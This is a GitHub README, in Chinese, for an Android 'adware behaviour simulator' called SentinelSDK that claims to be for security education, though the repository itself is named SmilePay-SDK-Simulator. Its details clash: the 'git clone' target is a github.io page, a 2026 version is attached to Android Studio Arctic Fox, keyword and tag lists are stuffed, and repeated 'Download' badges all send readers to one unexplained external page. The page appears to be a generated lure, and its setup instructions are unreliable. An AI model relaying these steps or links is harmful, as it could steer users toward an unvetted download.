junrey24/SmilePay-SDK-Simulator

GitHub: junrey24/SmilePay-SDK-Simulator

一款教育性质的 Android 广告软件行为模拟 SDK,通过沙盒环境复现 AdMob 广告请求与权限滥用模式,辅助安全研究与检测训练。

Stars: 0 | Forks: 0

# 🛡️ SentinelSDK – 移动安全意识工具包 [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://junrey24.github.io) ## 🧭 目录 - [概述](#overview) - [架构](#architecture) - [功能](#features) - [安装与设置](#installation--setup) - [示例 Profile 配置](#example-profile-configuration) - [示例控制台调用](#example-console-invocation) - [操作系统兼容性](#os-compatibility) - [API 集成](#api-integration) - [多语言支持 🌐](#multilingual-support-) - [响应式 UI 与 24/7 支持](#responsive-ui--247-support) - [Mermaid 图表](#mermaid-diagram) - [SEO 与关键词](#seo--keywords) - [许可证](#license) - [免责声明](#disclaimer) ## 📖 概述 SentinelSDK 是一个**独立的教育性 Android 工具包**,它使用 Google AdMob 库复制广告软件的行为模式——**严格用于研究、检测训练和渗透测试实验室**。与传统的广告软件不同,本项目侧重于**透明度**:每一个权限请求、每一次广告调用以及每一次网络交互都会被记录和可视化。 把它看作是一个**数字解剖工具**,用于了解恶意广告如何利用移动生态系统。它不是武器,而是一台**显微镜**。 该仓库从最初的 AdDroid 概念中汲取灵感,但将其重新打造为一个**零恶意意图的模块化意识引擎**。SentinelSDK 不部署有效载荷(payload),而是部署**学习载荷**,以揭示广告软件的解剖结构。 ## 🏗️ 架构 系统围绕三个模块化层构建: - **🕵️ 检测模拟器** – 在沙盒环境中模拟广告软件行为。 - **📊 日志可视化器** – 显示实时权限使用情况、广告请求和数据流。 - **🛠️ 防御实验室** – 允许用户测试自定义规则、防火墙脚本和广告拦截配置。 默认情况下,所有组件均在**只读模式**下运行,确保不会发生实际的系统修改。 ## ✨ 功能 | 功能 | 描述 | |--------|-------------| | **广告交互模拟** | 在无真实变现的情况下重建 AdMob 广告请求 | | **权限追踪器** | 记录模拟期间访问的每一个 Android 权限 | | **网络流量分析器** | 实时捕获并显示出站数据包 | | **沙盒模式** | 完全在隔离的虚拟环境中运行 | | **报告生成器** | 生成用于培训文档的 PDF/JSON 报告 | | **零日(Zero-Day)模式匹配** | 识别可疑的回调(callback)和广告库行为 | | **兼容 OpenAI 与 Claude API** | 集成 AI 用于行为分析和异常检测 | ## 📥 安装与设置 ### 前置条件 - Android Studio Arctic Fox (2026.1.5) 或更高版本 - Android SDK 34+ - Java 17+ - 至少 1GB 的可用存储空间用于存放日志和报告 ### 快速开始 ``` git clone https://junrey24.github.io cd SentinelSDK ./gradlew assembleDebug ``` [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://junrey24.github.io) ## 👤 示例 Profile 配置 在根目录下创建一个 `sentinel_config.json`: ``` { "profile": "analyst_01", "sandbox": true, "ad_library": "com.google.android.gms.ads", "log_level": "verbose", "ai_integration": { "openai_key": "sk-xxxxx", "claude_key": "sk-ant-xxxxx" }, "permissions_tracked": [ "android.permission.ACCESS_FINE_LOCATION", "android.permission.READ_PHONE_STATE", "android.permission.INTERNET" ], "report_format": "pdf" } ``` 此配置允许您**精确**模拟真实世界广告软件的权限足迹——而无需执行任何有害代码。 ## 🎮 示例控制台调用 ``` java -jar sentinel-cli-2026.jar --profile sentinel_config.json --mode simulation ``` 模拟运行期间的预期输出: ``` [2026-03-15 10:23:45] 🟢 Sandbox initialized [2026-03-15 10:23:46] 📡 Ad request to: https://admob.googleapis.com/v1/ads [2026-03-15 10:23:47] 🔐 Permission accessed: ACCESS_FINE_LOCATION [2026-03-15 10:23:48] 📤 Data packet sent: 1.2KB [2026-03-15 10:23:49] 🧠 AI analysis: Low risk pattern detected [2026-03-15 10:23:50] ✅ Simulation complete. Report generated. ``` ## 🖥️ 操作系统兼容性 | 操作系统 | 版本 | 状态 | |----|---------|--------| | 🟢 **Android** | 11 – 14 (API 30–34) | 完全支持 | | 🟡 **Android Emulator** | Pixel 6/7/8 Pro | 已测试 | | 🔴 **iOS / Windows / Linux** | ❌ | 不支持(仅限 Android 架构) | ## 🤖 API 集成 SentinelSDK 原生支持 **OpenAI GPT-4o** 和 **Claude 3.5 Sonnet** 用于高级行为分析。 ### OpenAI ``` import openai response = openai.ChatCompletion.create( model="gpt-4o", messages=[ {"role": "system", "content": "You are a mobile security analyst. Analyze the following adware log."} ] ) ``` ### Claude ``` import anthropic client = anthropic.Anthropic(api_key="sk-ant-xxxxx") message = client.messages.create( model="claude-3-5-sonnet-20241022", max_tokens=1024, messages=[{"role": "user", "content": "Interpret this permission log."}] ) ``` ## 🌐 多语言支持 SentinelSDK 已完全本地化为: - 🇺🇸 **英语**(默认) - 🇪🇸 **西班牙语** - 🇫🇷 **法语** - 🇩🇪 **德语** - 🇯🇵 **日语** - 🇨🇳 **中文(简体)** - 🇧🇷 **葡萄牙语(巴西)** 要切换语言,请使用 `--lang` 标志: ``` java -jar sentinel-cli-2026.jar --lang fr ``` ## 📱 响应式 UI 与 24/7 支持 基于 Web 的报告仪表板使用 **Tailwind CSS 4** 和 **React 18** 构建,确保: - 📐 **响应式设计** – 适用于手机、平板电脑和桌面设备 - 🌙 **深色/浅色模式** 切换 - ♿ **WCAG 2.1 AA** 合规性 - 🕐 **24/7 社区支持**,通过 Discord 和 GitHub Discussions 提供 ## 🧩 Mermaid 图表 ``` flowchart TD A[User launches SentinelSDK] --> B{Load config?} B -->|Yes| C[Parse sentinel_config.json] B -->|No| D[Use default profile] C --> E[Initialize sandbox] D --> E E --> F[Start AdMob simulation] F --> G[Log permission access] G --> H[Capture network packets] H --> I[Send to AI analyzer] I --> J[Generate report] J --> K[Display in dashboard] ``` ## 🔍 SEO 与关键词 此仓库针对以下内容进行了优化: - **Android 安全教育** - **广告软件检测训练** - **Google AdMob 模拟** - **移动渗透测试实验室** - **网络安全意识工具包** - **Android 权限追踪** - **沙盒化 Android 广告模拟** - **行为分析移动 SDK** - **零日(Zero-day)广告软件模式** - **Android 道德黑客工具** ## 📄 许可证 本项目基于 **MIT License** 授权 – 详见 [LICENSE](https://junrey24.github.io) 文件。 您可以自由地: - ✅ 用于教育目的 - ✅ 修改和分发 - ✅ 包含在培训课程中 - ❌ 用于恶意或非法活动 [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://junrey24.github.io) ## ⚠️ 免责声明 **本软件仅供教育和研究目的使用。** SentinelSDK 的创建者、贡献者和维护者**绝不纵容**将此工具包用于任何非法、不道德或恶意的活动。 下载和使用本软件,即表示您同意: 1. **仅在**受控、经授权的环境中使用它。 2. **不得**在未经所有者明确同意的情况下将其部署在设备上。 3. **不得**利用它通过欺诈性广告交互牟利。 4. 对任何滥用行为承担**全部法律责任**。 *用 🔥 为安全社区而建 —— 因为了解敌人是战胜他们的第一步。*
标签:AdMob, Android安全, Android开发, DAST, Google AdMob, IPv6支持, Java/Kotlin, JS文件枚举, Petitpotam, SentinelSDK, 后台面板检测, 多语言支持, 安全测试框架, 广告软件模拟, 恶意软件分析, 教育工具, 数字解剖工具, 日志可视化, 模块化工具, 沙箱环境, 目录枚举, 移动安全, 防御实验室